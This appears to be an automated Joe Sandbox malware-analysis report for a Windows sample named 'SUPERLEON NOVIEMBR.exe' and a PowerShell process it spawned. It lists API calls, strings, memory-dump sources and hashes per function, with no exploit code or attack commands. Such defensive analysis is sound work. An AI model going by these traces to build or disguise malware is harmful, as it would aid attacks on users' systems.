                                                                                                                                      • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                      • Opcode Fuzzy Hash: df88c7b315d98be26a832866f643f7765180fbf59289eea360610b16d9ed4daa
                                                                                                                                      • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                      Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040337C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040337C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                      • API String ID: 2659869361-2382934351
                                                                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                      • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                      • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                      Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close$Enum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                      • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                      • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                      • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                      • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                      Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                      • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                      • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                      • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                      • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                      Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                        • Part of subcall function 0040427D: SendMessageW.USER32(00010404,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                      • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                      • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                      • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                      • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                      Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061D9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                      • String ID: : Completed
                                                                                                                                      • API String ID: 3356406503-2954849223
                                                                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                      • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                      • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                                                                                      Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                      • API String ID: 1100898210-2382934351
                                                                                                                                      • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                      • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                                                                                      • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                      • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                                                                                      Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                      • API String ID: 2709904686-3976562730
                                                                                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                      • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                      • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                                                                                      Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                      • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                      • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                                                                                                                      Executed Functions

                                                                                                                                      Function 0726C0C6 Relevance: 8.1, Strings: 5, Instructions: 1844COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q$4'q$4'q
                                                                                                                                      • API String ID: 0-3272727544
                                                                                                                                      • Opcode ID: d169463db063fd0f70ff720d19bf8a7fe265626fe14029e9e77dbc4cd4ffd098
                                                                                                                                      • Instruction ID: f7b65fddf81905a013b910c95d755363c9af4b1007f18c2bf980bb5e3b2d3c3c
                                                                                                                                      • Opcode Fuzzy Hash: d169463db063fd0f70ff720d19bf8a7fe265626fe14029e9e77dbc4cd4ffd098
                                                                                                                                      • Instruction Fuzzy Hash: D70380B0B10219DFDB24DF54C854B9AB7B2FB85304F10849AD91AAB794CB71ED82CF91
                                                                                                                                      Function 02B7E260 Relevance: .7, Instructions: 674COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a9609729c47ecba05dd57c5bfade254053fc1e70f2affe3faa5c9d206e089be
                                                                                                                                      • Instruction ID: 116096fe76439f4db237f5cefacdd7821756d0db3ee999efd26b90b44457f36a
                                                                                                                                      • Opcode Fuzzy Hash: 3a9609729c47ecba05dd57c5bfade254053fc1e70f2affe3faa5c9d206e089be
                                                                                                                                      • Instruction Fuzzy Hash: A8525834A00619CFDB25DF64C894BADBBB2EF84304F1484E9D816AB355EB34E986CF51
                                                                                                                                      Function 0726A228 Relevance: 19.3, Strings: 15, Instructions: 593COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$_$tPq$tPq$$q$$q$$q$$q
                                                                                                                                      • API String ID: 0-3276640651
                                                                                                                                      • Opcode ID: 35e78857782ae9fad49da74883d866eb467be8a032d3c49e6ef229550e622d18
                                                                                                                                      • Instruction ID: c43310a2b5ad1b8c9b4f0a8dba0fd7cbbc47d57f9169b8e2ab35a333390ed6b6
                                                                                                                                      • Opcode Fuzzy Hash: 35e78857782ae9fad49da74883d866eb467be8a032d3c49e6ef229550e622d18
                                                                                                                                      • Instruction Fuzzy Hash: 14122AB1B202078FDB25DB69D41876ABBF2AFC5210F24C06BD906AB355DB31DD82C791
                                                                                                                                      Function 072631C0 Relevance: 8.4, Strings: 6, Instructions: 904COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                                                                                                      • API String ID: 0-1794337482
                                                                                                                                      • Opcode ID: 2c93bc94f7494b838e3f90a023b3ab59b632104d285b59d3f68c439184f17d7f
                                                                                                                                      • Instruction ID: ca66d9a14b426a4c2486ca73899b0d7bf93a726cff8b70cf71d102645942c478
                                                                                                                                      • Opcode Fuzzy Hash: 2c93bc94f7494b838e3f90a023b3ab59b632104d285b59d3f68c439184f17d7f
                                                                                                                                      • Instruction Fuzzy Hash: 06829EB0A10215DFDB24DF54C854BAEB7B2EF85304F10C5AAD51AAB791CB32AD82CF51
                                                                                                                                      Function 07260F88 Relevance: 8.1, Strings: 6, Instructions: 590COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q$4'q$tPq$tPq
                                                                                                                                      • API String ID: 0-3271992745
                                                                                                                                      • Opcode ID: 51324f17a3286c467282045576b42703e84d038124b3d7bbe741c9de8bcff581
                                                                                                                                      • Instruction ID: c7b2063df524a858d833c0311cb5228551d696da9c6ea434fdaacdbe7fd29f8f
                                                                                                                                      • Opcode Fuzzy Hash: 51324f17a3286c467282045576b42703e84d038124b3d7bbe741c9de8bcff581
                                                                                                                                      • Instruction Fuzzy Hash: 9032A2B4B102499FDB14CB58D455B9ABBB2FF85304F24C06AE9059F791CB72EC82CB91
                                                                                                                                      Function 07267F60 Relevance: 5.6, Strings: 4, Instructions: 585COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q$4'q
                                                                                                                                      • API String ID: 0-4210068417
                                                                                                                                      • Opcode ID: 3323d45f924237139a103c08a2512f5b244b04e25378628ab6928ad7d1fb3606
                                                                                                                                      • Instruction ID: d735b49f777277b89bc3f3d1525a80569d548e6785a30880f291e388d94ab4f5
